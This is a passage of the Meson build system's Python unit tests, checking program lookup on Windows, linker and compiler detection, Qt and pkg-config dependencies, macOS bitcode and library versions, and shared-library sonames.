PATH to point to a directory with Python scripts.
'''
testdir = os.path.join(self.platform_test_dir, '8 find program')
# Find `cmd` and `cmd.exe`
prog1 = ExternalProgram('cmd')
self.assertTrue(prog1.found(), msg='cmd not found')
prog2 = ExternalProgram('cmd.exe')
self.assertTrue(prog2.found(), msg='cmd.exe not found')
self.assertPathEqual(prog1.get_path(), prog2.get_path())
# Find cmd.exe with args without searching
prog = ExternalProgram('cmd', command=['cmd', '/C'])
self.assertTrue(prog.found(), msg='cmd not found with args')
self.assertPathEqual(prog.get_command()[0], 'cmd')
# Find cmd with an absolute path that's missing the extension
cmd_path = prog2.get_path()[:-4]
prog = ExternalProgram(cmd_path)
self.assertTrue(prog.found(), msg='{!r} not found'.format(cmd_path))
# Finding a script with no extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script'))
self.assertTrue(prog.found(), msg='test-script not found')
# Finding a script with an extension inside a directory works
prog = ExternalProgram(os.path.join(testdir, 'test-script-ext.py'))
self.assertTrue(prog.found(), msg='test-script-ext.py not found')
# Finding a script in PATH
os.environ['PATH'] += os.pathsep + testdir
# If `.PY` is in PATHEXT, scripts can be found as programs
if '.PY' in [ext.upper() for ext in os.environ['PATHEXT'].split(';')]:
# Finding a script in PATH w/o extension works and adds the interpreter
prog = ExternalProgram('test-script-ext')
self.assertTrue(prog.found(), msg='test-script-ext not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Finding a script in PATH with extension works and adds the interpreter
prog = ExternalProgram('test-script-ext.py')
self.assertTrue(prog.found(), msg='test-script-ext.py not found in PATH')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script with an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script-ext.py', command=[os.path.join(testdir, 'test-script-ext.py'), '--help'])
self.assertTrue(prog.found(), msg='test-script-ext.py with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script-ext.py')
# Using a script without an extension directly via command= works and adds the interpreter
prog = ExternalProgram('test-script', command=[os.path.join(testdir, 'test-script'), '--help'])
self.assertTrue(prog.found(), msg='test-script with full path not picked up via command=')
self.assertPathEqual(prog.get_command()[0], python_command[0])
self.assertPathEqual(prog.get_command()[2], '--help')
self.assertPathBasenameEqual(prog.get_path(), 'test-script')
# Ensure that WindowsApps gets removed from PATH
path = os.environ['PATH']
if 'WindowsApps' not in path:
username = os.environ['USERNAME']
appstore_dir = r'C:\Users\{}\AppData\Local\Microsoft\WindowsApps'.format(username)
            path += os.pathsep + appstore_dir
path = ExternalProgram._windows_sanitize_path(path)
self.assertNotIn('WindowsApps', path)
def test_ignore_libs(self):
'''
Test that find_library on libs that are to be ignored returns an empty
array of arguments. Must be a unit test because we cannot inspect
ExternalLibraryHolder from build files.
'''
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Not using MSVC')
        # Force this test to be updated whenever the list of ignored libraries
        # changes, and also verify the current list.
self.assertEqual(set(cc.ignore_libs), {'c', 'm', 'pthread', 'dl', 'rt', 'execinfo'})
for l in cc.ignore_libs:
self.assertEqual(cc.find_library(l, env, []), [])
def test_rc_depends_files(self):
testdir = os.path.join(self.platform_test_dir, '5 resources')
# resource compiler depfile generation is not yet implemented for msvc
env = get_fake_env(testdir, self.builddir, self.prefix)
depfile_works = env.detect_c_compiler(MachineChoice.HOST).get_id() not in {'msvc', 'clang-cl', 'intel-cl'}
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Test compile_resources(depend_file:)
# Changing mtime of sample.ico should rebuild prog
self.utime(os.path.join(testdir, 'res', 'sample.ico'))
self.assertRebuiltTarget('prog')
# Test depfile generation by compile_resources
# Changing mtime of resource.h should rebuild myres.rc and then prog
if depfile_works:
self.utime(os.path.join(testdir, 'inc', 'resource', 'resource.h'))
self.assertRebuiltTarget('prog')
self.wipe()
if depfile_works:
testdir = os.path.join(self.platform_test_dir, '12 resources with custom targets')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of resource.h should rebuild myres_1.rc and then prog_1
self.utime(os.path.join(testdir, 'res', 'resource.h'))
self.assertRebuiltTarget('prog_1')
def test_msvc_cpp17(self):
testdir = os.path.join(self.unit_test_dir, '45 vscpp17')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
try:
self.init(testdir)
except subprocess.CalledProcessError:
# According to Python docs, output is only stored when
# using check_output. We don't use it, so we can't check
# that the output is correct (i.e. that it failed due
# to the right reason).
return
self.build()
def test_install_pdb_introspection(self):
testdir = os.path.join(self.platform_test_dir, '1 basic')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
self.init(testdir)
installed = self.introspect('--installed')
files = [os.path.basename(path) for path in installed.values()]
self.assertTrue('prog.pdb' in files)
def _check_ld(self, name: str, lang: str, expected: str) -> None:
if not shutil.which(name):
raise unittest.SkipTest('Could not find {}.'.format(name))
envvars = [mesonbuild.envconfig.ENV_VAR_PROG_MAP['{}_ld'.format(lang)]]
# Also test a deprecated variable if there is one.
if f'{lang}_ld' in mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP:
envvars.append(
mesonbuild.envconfig.DEPRECATED_ENV_PROG_MAP[f'{lang}_ld'])
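        # For each variable, point it at `name` and confirm the detected compiler's
        # linker id matches the expected one.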
for envvar in envvars:
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
try:
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('Could not find a compiler for {}'.format(lang))
self.assertEqual(comp.linker.id, expected)
def test_link_environment_variable_lld_link(self):
env = get_fake_env()
        comp = env.detect_c_compiler(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('lld-link', 'c', 'lld-link')
def test_link_environment_variable_link(self):
env = get_fake_env()
        comp = env.detect_c_compiler(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('link', 'c', 'link')
def test_link_environment_variable_optlink(self):
env = get_fake_env()
        comp = env.detect_c_compiler(MachineChoice.HOST)
if isinstance(comp, mesonbuild.compilers.GnuLikeCompiler):
raise unittest.SkipTest('GCC cannot be used with link compatible linkers.')
self._check_ld('optlink', 'c', 'optlink')
@skip_if_not_language('rust')
def test_link_environment_variable_rust(self):
self._check_ld('link', 'rust', 'link')
@skip_if_not_language('d')
def test_link_environment_variable_d(self):
env = get_fake_env()
        comp = env.detect_d_compiler(MachineChoice.HOST)
if comp.id == 'dmd':
raise unittest.SkipTest('meson cannot reliably make DMD use a different linker.')
self._check_ld('lld-link', 'd', 'lld-link')
def test_pefile_checksum(self):
try:
import pefile
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('pefile module not found')
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir, extra_args=['--buildtype=release'])
self.build()
# Test that binaries have a non-zero checksum
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
cc_id = cc.get_id()
ld_id = cc.get_linker_id()
dll = glob(os.path.join(self.builddir, '*mycpplib.dll'))[0]
exe = os.path.join(self.builddir, 'cppprog.exe')
for f in (dll, exe):
pe = pefile.PE(f)
msg = 'PE file: {!r}, compiler: {!r}, linker: {!r}'.format(f, cc_id, ld_id)
if cc_id == 'clang-cl':
# Latest clang-cl tested (7.0) does not write checksums out
self.assertFalse(pe.verify_checksum(), msg=msg)
else:
# Verify that a valid checksum was written by all other compilers
self.assertTrue(pe.verify_checksum(), msg=msg)
def test_qt5dependency_vscrt(self):
'''
Test that qt5 dependencies use the debug module suffix when b_vscrt is
set to 'mdd'
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if OptionKey('b_vscrt') not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake') and not is_ci():
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output and not is_ci():
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Setup with /MDd
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
# Verify that we're linking to the debug versions of Qt DLLs
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build qt5core.exe: cpp_LINKER.*Qt5Cored.lib', contents)
self.assertIsNotNone(m, msg=contents)
def test_compiler_checks_vscrt(self):
'''
Test that the correct VS CRT is used when running compiler checks
'''
# Verify that the `b_vscrt` option is available
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if OptionKey('b_vscrt') not in cc.base_options:
raise unittest.SkipTest('Compiler does not support setting the VS CRT')
def sanitycheck_vscrt(vscrt):
checks = self.get_meson_log_sanitychecks()
self.assertTrue(len(checks) > 0)
for check in checks:
self.assertIn(vscrt, check)
testdir = os.path.join(self.common_test_dir, '1 trivial')
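        # The default buildtype is debug, so the sanity checks are expected to use the
        # debug DLL CRT (/MDd).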
self.init(testdir)
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=release'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=md'])
sanitycheck_vscrt('/MD')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mdd'])
sanitycheck_vscrt('/MDd')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mt'])
sanitycheck_vscrt('/MT')
self.new_builddir()
self.init(testdir, extra_args=['-Db_vscrt=mtd'])
sanitycheck_vscrt('/MTd')
def test_modules(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('C++ modules only work with the Ninja backend (not {}).'.format(self.backend.name))
if 'VSCMD_VER' not in os.environ:
            raise unittest.SkipTest('C++ modules are only supported with Visual Studio.')
if version_compare(os.environ['VSCMD_VER'], '<16.9.0'):
raise unittest.SkipTest('C++ modules are only supported with VS 2019 Preview or newer.')
self.init(os.path.join(self.unit_test_dir, '87 cpp modules'))
self.build()
@unittest.skipUnless(is_osx(), "requires Darwin")
class DarwinTests(BasePlatformTests):
'''
Tests that should run on macOS
'''
def setUp(self):
super().setUp()
self.platform_test_dir = os.path.join(self.src_root, 'test cases/osx')
def test_apple_bitcode(self):
'''
Test that -fembed-bitcode is correctly added while compiling and
-bitcode_bundle is added while linking when b_bitcode is true and not
when it is false. This can't be an ordinary test case because we need
to inspect the compiler database.
'''
testdir = os.path.join(self.platform_test_dir, '7 bitcode')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.id != 'clang':
raise unittest.SkipTest('Not using Clang on OSX')
# Try with bitcode enabled
out = self.init(testdir, extra_args='-Db_bitcode=true')
# Warning was printed
self.assertRegex(out, 'WARNING:.*b_bitcode')
# Compiler options were added
for compdb in self.get_compdb():
if 'module' in compdb['file']:
self.assertNotIn('-fembed-bitcode', compdb['command'])
else:
self.assertIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
# Linker options were added
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNotNone(m, msg=contents)
# Try with bitcode disabled
self.setconf('-Db_bitcode=false')
# Regenerate build
self.build()
for compdb in self.get_compdb():
self.assertNotIn('-fembed-bitcode', compdb['command'])
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('LINK_ARGS =.*-bitcode_bundle', contents)
self.assertIsNone(m, msg=contents)
def test_apple_bitcode_modules(self):
'''
Same as above, just for shared_module()
'''
testdir = os.path.join(self.common_test_dir, '149 shared module resolving symbol in executable')
# Ensure that it builds even with bitcode enabled
self.init(testdir, extra_args='-Db_bitcode=true')
self.build()
self.run_tests()
def _get_darwin_versions(self, fname):
fname = os.path.join(self.builddir, fname)
out = subprocess.check_output(['otool', '-L', fname], universal_newlines=True)
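        # The second line of `otool -L` output ends with
        # '(compatibility version X, current version Y)'; capture both version numbers.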
m = re.match(r'.*version (.*), current version (.*)\)', out.split('\n')[1])
self.assertIsNotNone(m, msg=out)
return m.groups()
@skipIfNoPkgconfig
def test_library_versioning(self):
'''
Ensure that compatibility_version and current_version are set correctly
'''
testdir = os.path.join(self.platform_test_dir, '2 library versions')
self.init(testdir)
self.build()
targets = {}
for t in self.introspect('--targets'):
targets[t['name']] = t['filename'][0] if isinstance(t['filename'], list) else t['filename']
self.assertEqual(self._get_darwin_versions(targets['some']), ('7.0.0', '7.0.0'))
self.assertEqual(self._get_darwin_versions(targets['noversion']), ('0.0.0', '0.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlyversion']), ('1.0.0', '1.0.0'))
self.assertEqual(self._get_darwin_versions(targets['onlysoversion']), ('5.0.0', '5.0.0'))
self.assertEqual(self._get_darwin_versions(targets['intver']), ('2.0.0', '2.0.0'))
self.assertEqual(self._get_darwin_versions(targets['stringver']), ('2.3.0', '2.3.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistver']), ('2.4.0', '2.4.0'))
self.assertEqual(self._get_darwin_versions(targets['intstringver']), ('1111.0.0', '2.5.0'))
self.assertEqual(self._get_darwin_versions(targets['stringlistvers']), ('2.6.0', '2.6.1'))
def test_duplicate_rpath(self):
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
# We purposely pass a duplicate rpath to Meson, in order
# to ascertain that Meson does not call install_name_tool
# with duplicate -delete_rpath arguments, which would
# lead to erroring out on installation
env = {"LDFLAGS": "-Wl,-rpath,/foo/bar"}
self.init(testdir, override_envvars=env)
self.build()
self.install()
def test_removing_unused_linker_args(self):
testdir = os.path.join(self.common_test_dir, '105 has arg')
env = {'CFLAGS': '-L/tmp -L /var/tmp -headerpad_max_install_names -Wl,-export_dynamic -framework Foundation'}
self.init(testdir, override_envvars=env)
@unittest.skipUnless(not is_windows(), "requires something Unix-like")
class LinuxlikeTests(BasePlatformTests):
'''
Tests that should run on Linux, macOS, and *BSD
'''
def test_basic_soname(self):
'''
Test that the soname is set correctly for shared libraries. This can't
be an ordinary test case because we need to run `readelf` and actually
check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '4 shared')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'libmylib.so')
soname = get_soname(lib1)
self.assertEqual(soname, 'libmylib.so')
def test_custom_soname(self):
'''
Test that the soname is set correctly for shared libraries when
a custom prefix and/or suffix is used. This can't be an ordinary test
case because we need to run `readelf` and actually check the soname.
https://github.com/mesonbuild/meson/issues/785
'''
testdir = os.path.join(self.common_test_dir, '25 library versions')
self.init(testdir)
self.build()
lib1 = os.path.join(self.builddir, 'prefixsomelib.suffix')
soname = get_soname(lib1)
self.assertEqual(soname, 'prefixsomelib.suffix')
def test_pic(self):
'''
Test that -fPIC is correctly added to static libraries when b_staticpic
is true and not when it is false. This can't be an ordinary test case
because we need to inspect the compiler database.
'''
if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
@mock.patch.dict(os.environ)
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
self.assertEqual(libhello_nolib.get_pkgconfig_variable('foo', {}), 'bar')
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
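        # First make sure the generated .pc file itself is valid according to pkg-config.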
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
        # pkg-config strips some duplicated flags so we have to parse the
        # generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
        # See common/45 pkgconfig-gen/meson.build for a description of the case this tests
with open(os.path.join(privatedir1, 'simple2.pc')) as f:
content = f.read()
self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content)
self.assertIn('Libs.private: -lz', content)
with open(os.path.join(privatedir1, 'simple3.pc')) as f:
content = f.read()
self.assertEqual(1, content.count('-lsimple3'))
with open(os.path.join(privatedir1, 'simple5.pc')) as f:
content = f.read()
self.assertNotIn('-lstat2', content)
@mock.patch.dict(os.environ)
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen')
self.init(testdir)
self.build()
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertFalse('blub_blob_blib' in pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def test_qt6dependency_qmake_detection(self):
'''
Test that qt6 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
        # Verify that qmake is for Qt6
if not shutil.which('qmake-qt6'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 6' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 6.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt6
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt6 \(modules: Core\) found: YES .* \((qmake|qmake-qt6)\)\n')
def glob_sofiles_without_privdir(self, g):
files = glob(g)
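        # Drop Meson's private per-target directories (e.g. libfoo.so.p), which would
        # otherwise match the shared-library globs used below.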
return [f for f in files if not f.endswith('.p')]
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
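        # self.prefix is an absolute path, so os.path.join() would discard self.installdir;
        # string concatenation reproduces the DESTDIR-style layout used by self.install().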
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '37 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '37 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir: str, compiler: 'Compiler') -> None:
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_cpp20 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=10.0.0', None) or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=10.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
key = OptionKey('std', lang=compiler.language)
for v in compiler.get_options()[key].choices:
# we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
# thus, C++ first
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
elif '++20' in v and not has_cpp20:
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
